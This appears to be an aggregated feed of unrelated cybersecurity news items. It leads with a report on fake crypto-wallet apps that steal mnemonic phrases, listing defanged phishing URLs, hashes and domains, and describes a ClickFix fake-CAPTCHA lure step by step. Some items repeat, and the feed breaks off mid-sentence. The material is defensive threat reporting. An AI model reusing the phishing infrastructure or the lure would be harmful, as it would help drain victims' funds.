Key Takeaways Over 20 malicious applications have been discovered actively targeting crypto wallet users. The apps impersonate popular wallets such as SushiSwap, PancakeSwap, Hyperliquid, and Raydium. They prompt users to enter their 12-word mnemonic phrase to access fraudulent wallet interfaces. These apps are distributed through the Play Store under compromised or repurposed developer accounts. Threat actors employ a common set of techniques: embedding phishing URLs in privacy policies, reusing package naming patterns, and utilizing frameworks for rapid deployment. Overview Cyble Research and Intelligence Labs (CRIL) has identified more than 20 cryptocurrency phishing applications on the Google Play Store. These malicious apps impersonate legitimate wallets like SushiSwap, PancakeSwap, Hyperliquid, and others. They employ phishing techniques to steal users’ mnemonic phrases, which are then used to access real wallets and drain cryptocurrency funds.   These apps have been progressively discovered over recent weeks, reflecting an ongoing and active campaign. Upon discovery, CRIL promptly reported the applications to Google, resulting in the removal of most of them from the Play Store. However, as of the time of publishing, a few of these applications are still live on the platform and have been reported for takedown. Figure 1 – Malicious application impersonating Hyperliquid wallet Figure 2 – Malicious application impersonating SushiSwap wallet The icons of legitimate wallets that we observed being used by the malicious applications to lure victims into trusting them have been listed below: Figure 3 – Legitimate wallet icons used by malicious apps We also observed that these malicious applications exhibit consistent patterns, such as embedding Command and Control (C&C) URLs within their privacy policies and using similar package names and descriptions. Despite these similarities, the apps are published under different developer accounts. These accounts were originally used to distribute legitimate apps, including gaming, video downloader, and live streaming applications, and some have amassed over 100,000 downloads. This behavior suggests that these older developer accounts have likely been compromised and are now being leveraged to distribute malicious applications. Figure 4 – Developer account previously hosting gaming apps and now distributing a malicious phishing app The malicious applications we found on the Play Store stealing Mnemonic Phrases of crypto wallet applications are: Name Package name Privacy Policy Pancake Swap co.median.android.pkmxaj hxxps://pancakefentfloyd.cz/privatepolicy.html Suiet Wallet co.median.android.ljqjry hxxps://suietsiz.cz/privatepolicy.html Hyperliquid co.median.android.jroylx hxxps://hyperliqw.sbs/privatepolicy.html Raydium co.median.android.yakmje hxxps://raydifloyd.cz/privatepolicy.html Hyperliquid co.median.android.aaxblp hxxps://hyperliqw.sbs/privatepolicy.html BullX Crypto co.median.android.ozjwka hxxps://bullxni.sbs/privatepolicy.html OpenOcean Exchange co.median.android.ozjjkx hxxps://openoceansi.sbs/privatepolicy.html Suiet Wallet co.median.android.mpeaaw hxxps://suietsiz.cz/privatepolicy.html Meteora Exchange co.median.android.kbxqaj hxxps://meteorafloydoverdose.sbs/privatepolicy.html Raydium co.median.android.epwzyq hxxps://raydifloyd.cz/privatepolicy.html SushiSwap co.median.android.pkezyz hxxps://sushijames.sbs/privatepolicy.html Raydium co.median.android.pkzylr            hxxps://raydifloyd.cz/privatepolicy.html SushiSwap co.median.android.brlljb hxxps://sushijames.sbs/privatepolicy.html Hyperliquid co.median.android.djerqq hxxps://hyperliqw.sbs/privatepolicy.html Suiet Wallet co.median.android.epeall            hxxps://suietwz.sbs/privatepolicy.html BullX Crypto co.median.android.braqdy hxxps://bullxni.sbs/privatepolicy.html Harvest Finance blog co.median.android.ljmeob hxxps://harvestfin.sbs/privatepolicy.html Pancake Swap co.median.android.djrdyk            hxxps://pancakefentfloyd.cz/privatepolicy.html Hyperliquid co.median.android.epbdbn hxxps://hyperliqw.sbs/privatepolicy.html Suiet Wallet co.median.android.noxmdz hxxps://suietwz.sbs/privatepolicy.html In addition to the 20 applications that shared similar privacy policies and leveraged the Median framework, we also identified two applications that used different package names and privacy policies. Despite these differences, their underlying objective remained the same: to steal users' Mnemonic Phrases. Application name Package names Privacy Policy Raydium cryptoknowledge.rays hxxps://www.termsfeed.com/live/a4ec5c75-145c-47b3-8b10-d43164f83bfc PancakeSwap com.cryptoknowledge.quizzz hxxps://www.termsfeed.com/live/a4ec5c75-145c-47b3-8b10-d43164f83bfc The following section covers the technical details of these malicious applications. Technical Details Type 1: Use of the Median Framework A Threat Actor was observed leveraging the Median framework to develop Android applications. This framework enables rapid conversion of websites into Android apps. Upon analyzing the configuration file, we found that the URL "hxxps://pancakefentfloyd[.]cz/api.php" was being used, which also matches the application's privacy policy URL. Figure 5 – App config file containing a phishing URL This URL leads to a phishing website specifically designed to steal mnemonic phrases and is loaded within a WebView in the application. In this instance, the phishing site impersonates the legitimate "PancakeSwap" wallet and prompts victims to enter their 12-word mnemonic phrase to gain access to their wallet. Figure 6 – Pancake Swap Phishing page loaded into Webview Type 2: Loading Phishing URL into Webview In the second type of malicious application, the Threat Actor directly loads a phishing website into a WebView without using any development framework. The malware opens the URL "hxxps://piwalletblog[.]blog" within the WebView, impersonating the legitimate Raydium wallet. Similar to the previously observed apps, this malicious application also prompts the user to enter their 12-word mnemonic phrase. Figure 7 – Loading phishing URL into WebView Figure 8 – Phishing site impersonating the Raydium wallet and asking for the Mnemonic phrase The phishing URL “hxxps://pancakefentfloyd[.]cz”, used in one of the observed malicious applications, is hosted on the IP address 94.156.177[.]209. A deeper investigation into this infrastructure uncovered that this IP is associated with over 50 phishing domains, all connected to a broader campaign aimed at stealing mnemonic phrases from users of various cryptocurrency wallets. Figure 9 – IP hosting multiple phishing domains These domains impersonate well-known crypto services and are designed to be loaded directly within mobile applications using WebView, making detection more challenging. The threat actor appears to be reusing this infrastructure across multiple fake apps and wallet brands, indicating a centralized and well-coordinated operation. Conclusion This campaign highlights a well-coordinated phishing operation targeting the rapidly growing user base of cryptocurrency wallets. By distributing over 20 counterfeit Android applications through the Google Play Store, the threat actors impersonate legitimate wallets such as PancakeSwap, SushiSwap, Raydium, and others to steal users’ mnemonic phrases—the essential keys to accessing their digital assets. What makes this campaign particularly dangerous is the use of seemingly legitimate applications, hosted under previously benign or compromised developer accounts, combined with a large-scale phishing infrastructure linked to over 50 domains. This not only extends the campaign’s reach but also lowers the likelihood of immediate detection by traditional defenses. If successful, these attacks can result in irreversible financial losses for victims, particularly since cryptocurrency transactions are not easily reversible or safeguarded like those in traditional banking. As the crypto ecosystem continues to expand, users must remain vigilant, and ecosystem stakeholders—including app stores, security vendors, and developers—must take proactive measures to swiftly identify, block, and report such threats. Our Recommendations We have outlined essential cybersecurity best practices that serve as the first line of defense against attackers. We recommend that our readers adhere to the best practices listed below: Download apps only from verified developers. Check app reviews and avoid apps that request sensitive information, such as mnemonic phrases. Use a reputable antivirus and internet security software package on your connected devices, including PCs, laptops, and mobile devices. Create strong passwords and implement multi-factor authentication wherever possible. Where applicable, enable biometric security features, such as fingerprint or facial recognition, to unlock your mobile device. Be cautious about opening any links received via SMS or emails that land in your phone. Ensure that Google Play Protect is enabled on Android devices. Indicators of Compromise (IOCs) Indicators Indicator Type Description 4b35a1ed93ab68f0401de34d4eb5dbb582465ee2a8428e16d0beac8bf87a09af   SHA256 Crypto phishing app impersonating Pancake Swap f288c626be0ba452e098d11b207867793522373c SHA1 Crypto phishing app impersonating Pancake Swap b703efe31690b6f84676e795d33f6283 MD5 Crypto phishing app impersonating Pancake Swap hxxps://pancakefentfloyd[.]cz/api.php URL Phishing URL loaded into Webview 4aa3659c50616d21ef0bda1389cba1ad3fe768b9dd25eee09289ece97cd3623f   SHA256   Crypto phishing app impersonating Raydium Wallet 265970e7f8f5c9618ffc215c7612eff4fe97f20a SHA1 Crypto phishing app impersonating Raydium Wallet b2e6fd5f9662c4215f89240c8c960977 MD5 Crypto phishing app impersonating Raydium Wallet hxxps://piwalletblog[.]blog URL Phishing site loaded into WebView cryptoknowledge[.]clickraydi-commerce[.]cz cetusdi[.]sbssuiscanfl[.]sbs suivisionsl[.]sbs suietsiz[.]cz openoceansi[.]sbs bravebn[.]sbs bullxni[.]sbs walrusod[.]sbs raydifloyd[.]czmeteorafloydoverdose[.]sbs bitunixflo[.]sbspancakefentfloyd[.]cz suietwz[.]sbs hyperliqw[.]sbs pumpjake[.]sbs raydiumsm[.]sbs harvestfin[.]sbs staratlas[.]sbs bubblemapsblogs[.]sbs sushijames[.]sbs aerodromeaz[.]sbs meteorablog[.]siteaerodromesblogs[.]site suietwallets[.]site jumperblogs[.]site sushiblogsite[.]site raydiumblogs[.]site pancakws[.]ru solscanpv[.]ru meteorasp[.]ru Domain Crypto phishing domain The post Over 20 Crypto Phishing Applications Found on the Play Store Stealing Mnemonic Phrases appeared first on Cyble.

In a recent post, I explored the butterfly effect of cybersecurity—the idea that one small misstep (like an over-permissioned user or misclassified document) can cascade into a major breach. Today, I want to go a step further: because it’s not just about access—it’s about architecture. Cybersecurity has always been about control. But what we’re controlling is changing. As data sprawls across SaaS platforms, cloud systems, and unstructured repositories, CISOs are being pulled upstream—into data strategy, lifecycle management, and governance. They’re not just protecting endpoints anymore. They’re shaping how information flows throughout their business. The shift: from defense to data-centric design For years, the CISO focused on defending the perimeter. But Gartner, Forrester, and IDC all point to the same reality: the perimeter is gone. Data itself is now the security object of value. As Gartner puts it,  “Security must become data-centric to align protection with business value.” While according to Forrester: “CISOs must become stewards of enterprise data, not just defenders of infrastructure.” That means asking: What data do we have? Where does it live? Who can access it—and why? What risk does it pose if exposed or misused? These are information architecture questions—not just security questions. Information sprawl = attack surface Every enterprise is a patchwork of productivity: Files in Box Shared links in Google Drive Unclassified documents in SharePoint Shadow data in abandoned AWS buckets This isn’t just messy—it’s risky. When information is unmanaged, security can’t protect what it can’t see. Governance and cybersecurity are converging Data protection regulations like GDPR, CCPA, and Australia’s Privacy Act reforms are raising the bar. It’s not enough to encrypt data or respond to breaches. Organizations must: Map sensitive data Classify it properly Apply risk-based controls Prove enforcement and accountability That convergence is putting CISOs in the same room as Chief Data Officers, legal, privacy, and compliance teams—not to react to incidents, but to architect prevention. The Modern CISO: Strategist. Steward. Architect. The CISO of 2025 isn’t just a technologist or risk manager. They’re part data strategist, information steward and architect of trust. Cybersecurity today isn’t just about stopping threats. It’s about enabling responsible innovation, privacy, and business trust—by understanding and protecting the flow of information. Final thought We used to ask. “How do we protect the network?” Then: “How do we secure identities and endpoints?” Now we ask, “How do we protect the data that powers the business—no matter where it lives?” That’s not just a security challenge. It’s an information architecture mandate. And many CISOs are already quietly stepping into that role. How is your security team evolving to handle information risk? Are you seeing the same convergence of data, governance, and cybersecurity? Additional sources ISACA, “Security teams are now responsible for classification, lifecycle, and access across business data.” IDC, “Effective data security starts with understanding the value of the data being used within the organization.” The post Why CISOs are quietly becoming information architects appeared first on OpenText Blogs.

The Ohio-based Kettering Health system said a recent cyberattack was by the Interlock ransomware gang, which had claimed to steal troves of data from the organization.

The Ohio-based Kettering Health system said a recent cyberattack was by the Interlock ransomware gang, which had claimed to steal troves of data from the organization.

The number of cybersecurity-related merger and acquisition (M&A) announcements surged in May 2025. The post Cybersecurity M&A Roundup: 42 Deals Announced in May 2025 appeared first on SecurityWeek.

When it comes to cybersecurity, organizations face an ever-present and often underestimated threat: human risk.

A KnowBe4 co-worker of mine recently got this SMS phishing message (i.e., smish).

The UK’s National Cyber Security Centre (NCSC) has introduced a set of six core principles to help organizations embed strong cybersecurity practices into their everyday operations. Developed in collaboration with government and industry leaders, this guidance aims to instill a lasting culture of security—one that prioritizes both technical controls and human behaviors to achieve sustainable cyber resilience.  Rather than focusing solely on compliance or isolated training efforts, the NCSC’s approach encourages organizations to foster a mindset of cyber hygiene, awareness, and responsibility at all levels. These core principles provide a flexible framework to guide cultural transformation and are tailored to suit organizations of all sizes and industries.  Why Culture Matters in Cybersecurity  Cybersecurity culture encompasses the collective values, behaviors, and norms that shape how individuals think about and respond to security risks. According to the NCSC, successful outcomes are not just the result of technological defenses but emerge when secure behaviors are routinely understood, encouraged, and practiced across the workforce.  The guidance is especially valuable for both cybersecurity professionals and leadership teams. While security teams may define strategies and implement controls, long-term cultural change requires buy-in from leadership—those who shape priorities, influence workplace norms, and model secure behaviors.  The Six Core Principles from NCSC  Frame Cybersecurity as an Enabler Organizations should align cybersecurity with their mission and objectives. Instead of viewing security as a hindrance, leaders must integrate it as a function that supports productivity, innovation, and trust. For example, framing secure practices as essential to protecting customer trust can create alignment between operational goals and cyber hygiene. When leadership communicates the value of security, it fosters a sense of shared purpose.  Encourage Openness Through Trust and Safety Creating psychological safety is key to encouraging secure behavior. Employees should feel comfortable reporting incidents, admitting mistakes, or asking questions, without fear of blame. Organizations that foster open communication and transparent incident handling are more agile and responsive to threats. “When people don’t fear punishment for reporting errors, they are more likely to contribute to organizational learning,” says the NCSC.  Adapt to Change to Improve Resilience Cyber threats evolve quickly, and security must evolve too. This principle encourages organizations to treat change as an opportunity for progress, not a threat. Whether updating policies or introducing new tools, the process should include collaboration across departments. Routine threat monitoring and employee feedback loops can help identify areas for improvement. Importantly, organizations must avoid "change fatigue" by ensuring that updates serve meaningful, strategic purposes.  Acknowledge the Role of Social Norms Informal behaviors often shape security more than formal rules. Social norms—like sharing passwords or circumventing protocols—can undermine well-intentioned policies if left unchecked. The NCSC recommends identifying both helpful and harmful norms and using positive peer influence to encourage secure behavior. For example, newcomers who see colleagues practicing good cyber hygiene are more likely to adopt those habits themselves.  Recognize Leadership’s Role in Cultural Change Leadership plays a crucial role in cultivating a secure culture. Leaders must model secure behavior, communicate its value, and build trust. When senior staff demonstrate openness about past mistakes or security challenges, they normalize learning and reduce fear. In contrast, when leadership ignores or bypasses policies, it sets a dangerous precedent. “Leadership sets the tone for the organization and can drive alignment between business and security objectives,” the NCSC notes.  Maintain Accessible and Clear Security Guidance  Security policies must be practical, understandable, and accessible. Overly complex or outdated guidelines not only confuse employees but also increase vulnerability. Policies should be written in plain language, tested in real-world scenarios, and regularly updated. Embedding these rules into onboarding and ongoing training helps reinforce good practices. Clear signage, simple language, and timely updates all contribute to effective governance.  Putting the Principles into Practice  Each principle is accompanied by real-world examples and practical suggestions. For instance:  Principle 1: Instead of security blocking sales efforts, sales and IT teams collaborate to create secure, efficient workflows.  Principle 2: Employees are encouraged to flag suspicious activity without fear of repercussions.  Principle 3: Cross-functional teams work together to find secure alternatives to unauthorized tools.  Principle 4: Guests are directed to a secure Wi-Fi network instead of being granted internal access.  Principle 5: Executives avoid excessive permissions, reinforcing best practices in access control.  Principle 6: Outdated pandemic-era policies are reviewed, updated, and clearly communicated.  Tools to Support Cultural Change  [caption id="" align="alignnone" width="960"] NCSC Cyber Security Culture Iceberg[/caption] The NCSC also offers the "Cyber Security Culture Iceberg" infographic, illustrating the visible and hidden elements that influence behavior. Surface-level actions—like following password policies—are supported by deeper organizational values, leadership practices, and team dynamics.  To reinforce these core principles, organizations are encouraged to:  Establish clear feedback mechanisms to evaluate current practices.  Bring together diverse stakeholders to collaboratively develop or refine policies.  Align rules with business goals and ensure they are user-friendly.  Celebrate secure behavior and use incentives to reinforce good habits.

For years, cyber attackers have held a strategic advantage. Zero Networks is changing that.  With a newly raised $55 million in Series C funding, Zero is paving the way for the Era of the Defender – a paradigm shift in cybersecurity that removes the burden from defenders reacting to threats and places it on attackers, forcing them to confront proactive, identity- and network-driven controls.  A New Age in Cybersecurity   Zero Networks’ Series C, led by Highland Europe…

The U.S. government wants to confiscate millions of dollars in funds tied to illegal employment of North Korean IT workers at American companies.

The U.S. government wants to confiscate millions of dollars in funds tied to illegal employment of North Korean IT workers at American companies.

The U.S. government wants to confiscate millions of dollars in funds tied to illegal employment of North Korean IT workers at American companies.

In a time when digital transformation is the backbone of public services, Chief Information Security Officers (CISOs) in government and public sector (Gov/PS) organizations are being stretched thin. Charged with safeguarding the integrity of systems that support national security, emergency services, and citizen welfare, these leaders face mounting pressure in an increasingly volatile cyber threat landscape. But it’s more than just about attacks. The responsibility they shoulder affects everyone, from ensuring water flows safely through municipal pipes to keeping communication networks alive during a national emergency. The Complexity of the Modern Threat Landscape Over the past five years, rapidly shifting geopolitical dynamics have escalated cyberattacks on critical infrastructure. Adversaries are capitalizing on outdated IT systems, underfunded cyber defenses, and unclear governance models. Many Gov/PS institutions operate on legacy infrastructures, some decades old, making them vulnerable to exploits that modern enterprises have long outgrown. Despite efforts to modernize, CISOs report feeling overwhelmed. According to KPMG, 65% of public sector organizations hesitate to invest in new cyber technologies due to a lack of understanding or trust. It’s a paradox: the need for innovation is urgent, but trust in emerging tools remains elusive. Budget Gaps and Brain Drains Adding to the burden is the scarcity of resources. Budget constraints, coupled with a shortage of skilled professionals, hinder effective cyber defense strategies. With private-sector salaries often outpacing what governments can offer, attracting top-tier cybersecurity talent becomes a losing game. Even as emerging technologies like artificial intelligence (AI), blockchain, and quantum computing promise improvements in efficiency and resilience, they also bring new attack surfaces. Managing these innovations requires skills and resources that many public sector entities simply do not have. Regulatory Tensions: Compliance vs. Capacity In Europe alone, frameworks like the Digital Operational Resilience Act (DORA), the NIS2 Directive, and the Cyber Resilience Act are set to affect thousands of public organizations. While well-intentioned, these regulations can contribute to "compliance fatigue," stretching already limited teams to their breaking points. In this climate, a shift in mindset is essential. Cybersecurity in the public sector is no longer about preventing every incident; it’s about being able to detect, respond, and recover when (not if) a breach occurs. Building Resilience By Design The public sector runs on critical infrastructure, power grids, transport systems, water treatment plants. A single cyberattack on any of these can paralyze essential services. As threats grow more advanced, resilience needs to be designed into the system, not bolted on as an afterthought. That means identifying and securing all assets, including operational technology (OT) that lives outside traditional IT environments. Third-party risk is another growing concern. As public organizations rely more on external vendors, each new partnership potentially expands the attack surface. Strong incident response plans, realistic drills, and cross-functional collaboration can minimize the impact of attacks. More importantly, fostering a culture of resilience empowers every employee to become an active line of defense. The AI Dilemma: Trust vs. Innovation AI is fast becoming a staple in the Gov/PS toolkit, used in everything from traffic flow management to fraud detection. Yet, its adoption has outpaced discussions around trust and security. Poor-quality training data, opaque algorithms, and bias risks all threaten the credibility of AI systems. CISOs need to embed trust across the AI lifecycle, from data sourcing and model design to deployment and monitoring. This involves close collaboration with governance, IT, and business stakeholders to ensure data integrity and algorithmic transparency. Interestingly, there is progress. KPMG reports that 76% of public sector CISOs are now involved early in tech investment discussions. This early involvement enables the development of proactive, not reactive, AI security frameworks. Threats to AI: Model Poisoning and Beyond AI systems are increasingly being targeted by cybercriminals using techniques like adversarial attacks and model poisoning. These tactics can manipulate outputs, leading to decisions that may harm public safety or violate privacy regulations. Real-time monitoring, anomaly detection, and adaptive risk assessment must become standard practice. By embedding security throughout the AI development pipeline, CISOs can reduce the need for costly retrofits later. The Digital Identity Imperative With governments pushing digital-first strategies, secure digital identity systems are crucial. These systems underpin access to services like healthcare, banking, and social security. However, they are now facing attacks including deepfakes and automated credential theft. Machine identities, particularly those used in IoT systems, are also becoming a critical blind spot. These non-human service accounts often have elevated privileges, making them prime targets. CISOs must take the lead in developing transparent and secure identity frameworks. This means accounting for everything from biometric data protections to compliance with frameworks like GDPR and eIDAS. Trust and Public Expectation Public trust in digital systems is fragile. Any breach can quickly erode confidence and create long-term reputational damage. CISOs must prioritize privacy by design and actively communicate how citizen data is being used, stored, and protected. Collaboration is essential. Governments must work with private sector technology companies to develop interoperable, secure identity solutions. These partnerships can help bridge gaps in standards, regulation, and innovation. What Lies Ahead Most government and public sector organizations acknowledge the growing cyber risk, yet many remain underprepared. Legacy systems, funding shortages, and slow innovation adoption create a high-risk environment. Bridging the gap between recognition and action is no longer optional—it’s critical. CISOs must push for better funding, make cyber hygiene a boardroom issue, and promote a security-first culture across their organizations. By shifting focus from mere compliance to true resilience, they can ensure their institutions are not only secure but trusted by the communities they serve. As technology continues to evolve, so too must the strategies for securing it. The path forward requires courage, collaboration, and a renewed commitment to protecting the digital foundations of our public life.

A new wave of browser-based phishing tricks unsuspecting users into copy-pasting malicious commands into their systems, all while believing they’re completing a legitimate CAPTCHA verification. According to a SlashNext research, attackers have been found cloning the Cloudflare Turnstile interface, a privacy-preserving CAPTCHA alternative to verify if a user is human, to lure users into executing a malware. Commenting on why this is an absolute winner for the threat actors, Lionel Litty, chief security architect at Menlo Security, said, “These social engineering attacks are often successful because they astutely tap into users’ frustration: having to solve yet another CAPTCHA.” They then go on to provide instructions that are both obscure for many users and easy to follow, Litty added. In SlashNext observations, Victims were presented with a fake security check with real-looking branding and a Ray ID, a Cloudflare-assigned identifier. After clicking “Verify you are human,” users are guided through key presses that unknowingly paste and run a hidden PowerShell command copied to their clipboard. These ClickFix campaigns (including the one using TurnStile CACHE) were used to deliver a range of payloads, including information stealers such as Lumma and Stealc, as well as full-fledged remote access trojans (RATs) like NetSupport Manager designed for full system compromise. Fake Captcha used as new phishing frontier SlashNext researcher Daniel Kelley warned that the observed campaign signals threat actors moving from traditional phishing that involves direct prompting of a file download, to a more sophisticated ClickFix attack that looks like a legitimate security check. The attack begins through compromised websites containing malicious JavaScript. When users interact with these sites, they’re redirected to deceptive pages that display error messages or CAPTCHA verifications, urging users to perform actions such as copying and pasting commands into their system’s terminal or PowerShell. “When a victim visits a malicious or compromised site, they see a message ‘Checking if the site connection is secure-Verify you are human’ just as they would on a real Cloudflare page,” Kelley said in a blog post. Subsequently, a pop-up or on-page message directs users through a sequence of key presses — including Win+R, Ctrl+V, and Enter — resulting in execution of the malware on their machine. “The concept of phishing users with fake security controls is not a new one,” said James Maude, field CTO at BeyondTrust. “In the past, threat actors have had great success with phishing documents that trick users into allowing malicious macros to run using fake security checks that claim the document needs macros enabled for security.” As defences have evolved and gotten better at blocking phishing email attachments that launch malicious code, threat actors have evolved their techniques, too, to find more creative ways to manipulate users into executing code, Maude noted. Fail-proof exploit of ‘verification fatigue’ SlashNext highlighted that the campaign’s success stems largely from its exploitation of human psychology. “Modern internet users are inundated with spam checks, CAPTCHAs, and security prompts on websites, and they’ve been conditioned to click through these as quickly as possible,” Kelley added. “Attackers exploit this ‘verification fatigue,’ knowing that many users will comply with whatever steps are presented if it looks routine.” The absence of immediate red flags like suspicious downloads, added with deceptive design using trusted branding and interface, provides a false sense of security. “We have seen an increasing number of this type of attack over the past several months and have had multiple customers inquire about possible ways to hinder the attack,” Litty said. “Because of their limited visibility into browser behavior, AV products and other endpoint protection solutions tend to miss these attacks.” Litty noted a need for browser-specific solutions, including tools for browser isolation, that can detect a website that writes content into the clipboard and flag it to users. ClickFix tactics aren’t anything new and have been picked up in recent years by nation-state actors, most notably in the “Contagious Interviews” campaign linked to the North Korea-aligned Kimsuky group. Other notable state-sponsored actors known for using ClickFix include MuddyWater(Iran), APT28 and UNK_RemoteRogue(Russia).

The new PathWiper, spotted in an attack on Ukrainian critical infrastructure, has similarities to wiper malware previously deployed by the Russian group known as Sandworm.

Don't negotiate unless you must, and if so, drag it out as long as you can Feature  So, the worst has happened. Computer screens all over your org are flashing up a warning that you've been infected by ransomware, or you've got a message that someone's been stealing information from your server.

A colossal data breach has reportedly exposed approximately four billion records containing personal information of hundreds of millions of users, primarily from China. The 631-gigabyte database was discovered sitting wide open on the internet, lacking even the most basic password protection, >according to cybersecurity firm Cybernews, which reported its findings based on its own research. What makes this breach particularly alarming isn’t just its size, though at four billion records, it’s believed to be the largest single-source leak of Chinese personal data ever found — it’s the breadth and depth of information that was exposed. According to the report, the researchers stumbled upon what appears to be a digital goldmine for anyone looking to build comprehensive profiles on Chinese citizens while working with cybersecurity researcher Bob Dyachenko of SecurityDiscovery.com. The researchers feel that the dataset was “meticulously gathered and maintained for building comprehensive behavioral, economic, and social profiles of nearly any Chinese citizen.” “The sheer volume and diversity of data types in this leak suggests that this was likely a centralized aggregation point, potentially maintained for surveillance, profiling, or data enrichment purposes,” the report added. WeChat data and financial information leaked After this massive discovery was made, the researchers reported that the database was taken offline. But before it vanished from public view, researchers managed to peek inside and found 16 distinct data collections — each one a treasure trove of personal information, as they put it. The crown jewel was a collection called “wechatid_db” with more than 805 million records, almost certainly pulled from WeChat, the ubiquitous Chinese super-app that’s become as essential as breathing for many users. But the financial data is where things get truly scary. Imagine having your payment card numbers, birthdate, name, and phone number stored in a database labeled simply “bank” — that’s exactly what happened to over 630 million people. Add to that another 300 million records from Alipay, China’s dominant mobile payment platform, and you’ve got a cybercriminal’s dream come true. The cherry on top? A collection of over 780 million home addresses, complete with geographic details. Suddenly, bad actors don’t just know what you spend—they know where you live and what you buy. Surveillance and profiling capabilities raise concerns Here’s the thing that keeps security experts up at night: this wasn’t just a random data dump. The meticulous organization and sheer scope suggest someone was building detailed dossiers on Chinese citizens. The exposed data reads like a surveillance state’s wish list. Beyond the financial and contact information, there were collections covering everything from gambling habits to vehicle registrations, employment details, and pension information. According to the report, one collection, ominously named in Mandarin characters translating to “three-factor checks,” contained over 610 million records with what researchers believe were user IDs, phone numbers, and usernames — the holy trinity for identity verification. The database also contained more than 353 million additional records spread across nine collections covering gambling activities, vehicle registrations, employment information, pension funds, and insurance data. Researchers identified one collection, “tw_db,” as potentially containing Taiwan-related information. “There’s no shortage of ways threat actors or nation states could exploit the data,” the report added. “With a data set of that magnitude, everything from large-scale phishing, blackmail, and fraud to state-sponsored intelligence gathering and disinformation campaigns is on the table.” Attribution remains elusive as the database disappears Despite extensive investigation, the Cybernews team could not identify the database’s owners or operators. The exposed instance was quickly taken offline after discovery, preventing researchers from conducting deeper analysis or determining attribution. “Individuals who may be affected by this leak have no direct recourse due to the anonymity of the owner and lack of notification channels,” the research team noted. The scale and sophistication of the data aggregation suggest significant resources and technical capabilities behind the operation. Researchers indicated that collecting and maintaining such a comprehensive database requires substantial time, effort, and infrastructure typically associated with nation-state actors, organized threat groups, or well-resourced research organizations. China’s ongoing data security challenges This breach represents the latest in a series of significant data exposures affecting Chinese users. Previous incidents, the Cybernews researchers have conducted, included leaks affecting 1.5 billion records from Weibo, DiDi, and Shanghai Communist Party databases, as well as another breach exposing 1.2 billion Chinese user records. More recently, attackers leaked 62 million iPhone users’ records online. “However, we could not identify any data leak that surpasses four billion records,” the report said. “That would make this data leak the largest single-source leak of Chinese personal data ever identified.”

Experts at Infosecurity Europe 2025 highlighted a range of major industry trends, from advanced social engineering techniques to vulnerability exploits

Retail media is an opportunity for retailers to generate additional revenue by selling physical and digital advertising space.

When I first began advising organizations on AI implementation and adoption, I noticed a concerning trend: Organizational leaders were fixated on the hype cycle, yet lacked a clear understanding of why it mattered to their business or where it could have an impact. Boards and leadership teams asked their executive(s) responsible for data superficial questions, such as “what are we doing with AI,” with no connection, alignment or engagement to company strategies or goals. But behind the C-suite and boardroom questions was a more fundamental disconnect. AI efforts weren’t grounded in business priorities. And worse, they weren’t connected to the people expected to enable or adopt them. In one large enterprise, I witnessed firsthand how disjointed communication about AI led to employee disillusionment. Leadership poured millions into automation technologies without aligning initiatives to job design, reskilling paths or incentives. Meanwhile, that same disjointed internal messaging about AI left employees feeling demoralized and unmotivated to support or enable data and AI transformation. Gartner describes the employee experience as a “fear of the unknown” in 3 barriers to AI adoption. The friction between people, processes and systems that is constantly left unaddressed is the real problem.  This friction can be observed in: An increased willingness from leaders to invest millions in technology upgrades despite ambiguity on purpose A decreased willingness and active divestment from upskilling or changing legacy behaviors Ask a manager if you can attend a conference or take a paid course to upskill so that you can acquire the relevant skills for an AI-enabled workforce and suddenly there’s no budget. The demonstrated selectiveness to invest in technology and not the workforce sends a loud, clear message to employees. However, as noted by Gartner,  the first barrier organizations will face in attempting AI transformation is skills or the lack of skills to successfully drive AI transformation.  So why are we surprised that AI “isn’t delivering?” The truth is you can’t succeed without your people and that requires T.R.U.S.T.:  Transparency. Is data openly accessible, clearly defined and easy to challenge? Relationships. Are cross-functional teams collaborating…or competing for control? Understanding. Do your people have the literacy and support they need to feel confident using data? Safety. Can employees ask questions, surface risks or say “I don’t know” without fear? Tone from the top. Is there transparency, training, intentional change management and incentives to adopt the change?  AI resistance isn’t technical, it’s tribal  Every time a headline drops about AI taking jobs, a CDAI or CIO somewhere dreads the conversations that follow. What I’ve seen across industries is that resistance to AI isn’t about the algorithms. It’s about power, protection and identity.  For example, a client introduced a language model to help their compliance team reduce manual review. The tech worked, but employees pushed back hard. Why? Because no one had clarified how their work would evolve, only that it would “change.” McKinsey makes the following statement about how data leaders can help employees overcome their fear of the unknown: “Senior leaders could counter employees’ prevailing fears of ‘replacement and loss’ with messaging about gen AI’s potential for ‘augmentation and improvement’ and its ability to significantly enhance the employee experience.”   When employees believe their role is threatened, they hoard knowledge, resist and reject process changes. In addition, failure to address those concerns ensures lost opportunities to engage, collaborate and collectively experience positive value from embracing AI. Employees aren’t resisting AI because they don’t understand the technology; they resist because they fear being made irrelevant. Without psychological safety, AI adoption becomes a power struggle. And when that fear festers, teams lose the very collaboration and curiosity that makes innovation possible. Without a clear story, friction takes over, initiatives fail and organizations lose time, money, morale and productivity. We have to build incentive structures that reward frictionless behavior: knowledge sharing, sharing data, aligning cross-functionally, admitting uncertainty and testing fast. That’s a cultural retrofit not a technical one. Design for AI by starting with structure, not software The reality is that many of your legacy constructs, including organizational structures and processes, will be impacted as you introduce AI into your organization. Large organizations, unlike AI-native startups, can’t take a lean-first approach because the strategic knowledge needed to invest smartly is embedded in the workforce, not just the executive suite. Designing for AI means doing the opposite of what most roadmaps suggest: it means starting with the organizational chart and business goals, not the model. Why does this matter? In “AI will evolve into an organizational strategy for all,” Wired’s Ethan Wollic presents a compelling case that the future will bring: “A surge in ‘AI-native’ startups that build their entire operational model around human-AI collaboration from day one. These companies will be characterized by small, highly skilled human teams working in concert with sophisticated AI systems to achieve outputs that rival those of much larger traditional organizations.” In the same article, Wollic argues that, in contrast, large enterprises will derive value from AI transformation through workers and managers across departments who identify meaningful ways to use AI to enhance performance. This underscores the critical role of employees in surfacing opportunities, shaping implementation and ensuring adoption. Unlike startups that are built lean by design, enterprises must first unlock and integrate the operational intelligence that already exists within the workforce, but most AI strategies skip it entirely. Diagnose and dismantle the real barriers to scale In a recent engagement with a multinational client, we conducted what I call an “AI friction audit.” We mapped the places where AI initiatives had failed to scale, and what we found wasn’t surprising, but it was telling. The greatest barriers weren’t technical. They were structural and cultural: political competition between departments, unclear decision rights, lack of consensus on value and zero shared incentives for collaboration. These weren’t isolated pain points; they were system-wide design flaws. The resulting conversations helped the leadership team understand what their roadmap had overlooked: that AI changes power dynamics, workflows and the very DNA of an organization. When your structures and incentives don’t evolve with the technology, the 